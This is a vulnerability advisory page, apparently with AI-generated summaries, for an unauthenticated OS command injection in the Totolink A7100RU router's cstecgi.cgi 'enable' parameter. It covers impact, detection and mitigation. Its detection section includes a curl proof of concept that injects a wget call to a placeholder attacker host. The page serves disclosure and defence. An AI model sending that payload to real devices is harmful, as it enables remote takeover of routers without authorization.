CVE-2026-6028
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (setPptpServerCfg

Publication date: 2026-04-10

Last updated on: 2026-04-10

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-10
Last Modified
2026-04-10
Generated
2026-06-16
AI Q&A
2026-04-10
EPSS Evaluated
2026-06-14
NVD
CVE-2026-6028
EUVD
EUVD-2026-21322
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-6028 is a remote command injection vulnerability found in the TOTOLINK A7100RU router, specifically in version 7.4cu.2313_b20191024. The flaw exists in the CGI script cstecgi.cgi, within the function that processes the "enable" parameter. This parameter is not properly sanitized before being passed to a system command execution function, allowing an attacker to inject and execute arbitrary operating system commands remotely by sending a crafted HTTP POST request.

Impact Analysis

This vulnerability allows an attacker to remotely execute arbitrary OS commands on the affected TOTOLINK A7100RU router without any authentication. This can lead to full compromise of the device, enabling the attacker to control the router, intercept or manipulate network traffic, install malware, or use the device as a foothold for further attacks within the network.

Detection Guidance

This vulnerability can be detected by monitoring for suspicious HTTP POST requests to the /cgi-bin/cstecgi.cgi endpoint that include the "enable" parameter with unusual or command-like values.

A practical detection method is to capture and analyze network traffic for POST requests containing JSON payloads with the "enable" parameter set to commands such as wget or other shell commands.

For example, using a tool like tcpdump or Wireshark, you can filter HTTP POST requests to the vulnerable endpoint:

  • tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep '/cgi-bin/cstecgi.cgi'

Alternatively, using curl or similar tools, you can test the vulnerability by sending a crafted POST request with a payload containing a command in the "enable" parameter to see if the router executes it (only in a controlled environment):

  • curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -d '{"enable":"wget http://[attacker_ip]/testpoc"}' -H 'Content-Type: application/json'
Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable /cgi-bin/cstecgi.cgi endpoint by implementing network-level controls such as firewall rules to block unauthorized external access.

Additionally, disabling remote management features on the TOTOLINK A7100RU router can reduce exposure to remote exploitation.

If possible, update the router firmware to a version that patches this vulnerability or contact the vendor for an official fix.

As a temporary workaround, monitor logs and network traffic for suspicious POST requests targeting the "enable" parameter and block or alert on such activity.

Compliance Impact

The provided information does not specify how CVE-2026-6028 affects compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-6028. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart